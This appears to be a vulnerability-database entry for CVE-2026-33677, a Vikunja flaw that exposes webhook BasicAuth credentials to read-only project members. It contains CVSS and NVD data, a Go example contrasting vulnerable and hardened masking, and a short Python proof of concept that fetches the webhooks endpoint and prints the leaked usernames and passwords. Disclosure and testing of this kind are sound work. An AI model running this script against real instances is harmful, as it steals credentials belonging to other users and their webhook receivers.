Security Vulnerability Report
CVE-2026-33677 CVSS 6.5 MEDIUM

CVE-2026-33677

Published: 2026-03-24 16:16:35
Last Modified: 2026-03-27 16:29:44

Description

Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, the `GET /api/v1/projects/:project/webhooks` endpoint returns webhook BasicAuth credentials (`basic_auth_user` and `basic_auth_password`) in plaintext to any user with read access to the project. While the existing code correctly masks the HMAC `secret` field, the BasicAuth fields added in a later migration were not given the same treatment. This allows read-only collaborators to steal credentials intended for authenticating against external webhook receivers. Version 2.2.1 patches the issue.
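The masking gap the description lays out, as an added example in Go (the language Vikunja is written in) that is not Vikunja's own code: a simplified webhook record carrying the three credential fields named above, the pre-2.2.1 pattern in which only `secret` is blanked before the list is returned to a project reader, a hardened version that routes every record through one redaction method so a field added later cannot bypass it, and a `leakedFields` checker that, given a serialized list response, reports which credential fields came back non-empty. The type, function and field names and the sample rows are constructed for this example and are assumptions; only the JSON keys `secret`, `basic_auth_user` and `basic_auth_password` come from the advisory. Clearing the username as well as the password is a choice made here; the advisory does not say how the 2.2.1 fix treats it.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Webhook is a simplified stand-in for a project webhook record. The Go
// field names are assumptions for this example; the JSON keys mirror the
// ones named in the advisory. This is not Vikunja's own type.
type Webhook struct {
	ID                int64  `json:"id"`
	TargetURL         string `json:"target_url"`
	Secret            string `json:"secret"`              // HMAC signing secret, masked pre-2.2.1
	BasicAuthUser     string `json:"basic_auth_user"`     // added in a later migration, not masked
	BasicAuthPassword string `json:"basic_auth_password"` // added in a later migration, not masked
}

// credentialFields is the single list of JSON keys that must never reach a
// reader. A field added in a later migration has to be registered here once,
// instead of being remembered at every call site that builds a response.
var credentialFields = []string{"secret", "basic_auth_user", "basic_auth_password"}

// sampleWebhooks is constructed test data standing in for rows in the
// webhooks table; the values are placeholders, not real credentials.
func sampleWebhooks() []Webhook {
	return []Webhook{
		{ID: 1, TargetURL: "https://receiver.example/hook", Secret: "hmac-secret-1",
			BasicAuthUser: "hookuser", BasicAuthPassword: "hookpass"},
		{ID: 2, TargetURL: "https://other.example/hook", Secret: "hmac-secret-2"},
	}
}

// listVulnerable reproduces the pre-2.2.1 pattern the advisory describes:
// the HMAC secret is blanked, but the later-added BasicAuth fields are
// copied through to the reader untouched.
func listVulnerable(stored []Webhook) []Webhook {
	out := make([]Webhook, len(stored))
	for i, w := range stored {
		w.Secret = ""
		out[i] = w
	}
	return out
}

// redacted returns a copy of w with every credential-bearing field cleared.
func (w Webhook) redacted() Webhook {
	w.Secret = ""
	w.BasicAuthUser = ""
	w.BasicAuthPassword = ""
	return w
}

// listHardened routes every record through the one redaction method, so a
// new secret-bearing field only needs to be added in redacted() to be covered.
func listHardened(stored []Webhook) []Webhook {
	out := make([]Webhook, len(stored))
	for i, w := range stored {
		out[i] = w.redacted()
	}
	return out
}

// leakedFields inspects a serialized list response the way a tester would
// after calling the endpoint: it returns "id:field" for every credential
// field that came back non-empty. An empty result means the instance masks them.
func leakedFields(body []byte) ([]string, error) {
	var hooks []map[string]interface{}
	if err := json.Unmarshal(body, &hooks); err != nil {
		return nil, err
	}
	var leaks []string
	for _, h := range hooks {
		for _, f := range credentialFields {
			if s, ok := h[f].(string); ok && s != "" {
				leaks = append(leaks, fmt.Sprintf("%v:%s", h["id"], f))
			}
		}
	}
	return leaks, nil
}

// vulnerableResponse and hardenedResponse serialize the sample rows the way
// an unpatched and a patched server would, for comparison with leakedFields.
func vulnerableResponse() []byte {
	b, _ := json.Marshal(listVulnerable(sampleWebhooks()))
	return b
}

func hardenedResponse() []byte {
	b, _ := json.Marshal(listHardened(sampleWebhooks()))
	return b
}

func main() {
	for name, body := range map[string][]byte{
		"vulnerable": vulnerableResponse(),
		"hardened":   hardenedResponse(),
	} {
		leaks, err := leakedFields(body)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%-10s leaked credential fields: %v\n", name, leaks)
	}
}
```

The same `leakedFields` check can be pointed at the body returned by a real `GET /api/v1/projects/:project/webhooks` call with a read-only token: a non-empty result on a 200 response is the condition the advisory describes, and an empty one is what 2.2.1 should produce.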

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:* - VULNERABLE
Vikunja < 2.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target API endpoint for a specific project.
# Replace PROJECT_ID with the actual target project ID.
target_url = "https://<vikunja-domain>/api/v1/projects/PROJECT_ID/webhooks"

# Headers with authentication (JWT token or session token).
# The attacker only needs 'read' access to the project.
headers = {
    "Authorization": "Bearer <READ_ACCESS_TOKEN>",
    "Content-Type": "application/json",
}

try:
    # Send GET request to fetch the project's webhooks.
    # A timeout is set so the request cannot hang indefinitely.
    response = requests.get(target_url, headers=headers, timeout=10)

    if response.status_code == 200:
        webhooks_data = response.json()

        # Iterate through the webhooks looking for credential fields.
        # Vulnerability: basic_auth_user and basic_auth_password are returned
        # in plaintext by versions before 2.2.1.
        if isinstance(webhooks_data, list):
            for webhook in webhooks_data:
                print(f"[+] Webhook ID: {webhook.get('id')}")
                print(f"    Basic Auth User: {webhook.get('basic_auth_user')}")
                print(f"    Basic Auth Password: {webhook.get('basic_auth_password')}")
        else:
            print("[-] Unexpected response format")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

https://github.com/go-vikunja/vikunja/security/advisories/GHSA-7c2g-p23p-4jg3 (Exploit, Vendor Advisory)
https://vikunja.io/changelog/vikunja-v2.2.2-was-released (Release Notes)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33677", "sourceIdentifier": "[email protected]", "published": "2026-03-24T16:16:35.113", "lastModified": "2026-03-27T16:29:43.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, the `GET /api/v1/projects/:project/webhooks` endpoint returns webhook BasicAuth credentials (`basic_auth_user` and `basic_auth_password`) in plaintext to any user with read access to the project. While the existing code correctly masks the HMAC `secret` field, the BasicAuth fields added in a later migration were not given the same treatment. This allows read-only collaborators to steal credentials intended for authenticating against external webhook receivers. Version 2.2.1 patches the issue."}, {"lang": "es", "value": "Vikunja es una plataforma de gestión de tareas de código abierto autoalojada. Antes de la versión 2.2.1, el endpoint 'GET /API/v1/projects/:project/webhooks' devuelve las credenciales BasicAuth del webhook ('basic_auth_user' y 'basic_auth_password') en texto plano a cualquier usuario con acceso de lectura al proyecto. Si bien el código existente enmascara correctamente el campo 'secret' de HMAC, los campos BasicAuth añadidos en una migración posterior no recibieron el mismo tratamiento. Esto permite a los colaboradores de solo lectura robar credenciales destinadas a la autenticación contra receptores de webhook externos. La versión 2.2.1 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.1", "matchCriteriaId": "E8647862-9C78-473D-9FED-7AFC24335A61"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-7c2g-p23p-4jg3", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://vikunja.io/changelog/vikunja-v2.2.2-was-released", "source": "[email protected]", "tags": ["Release Notes"]}]}}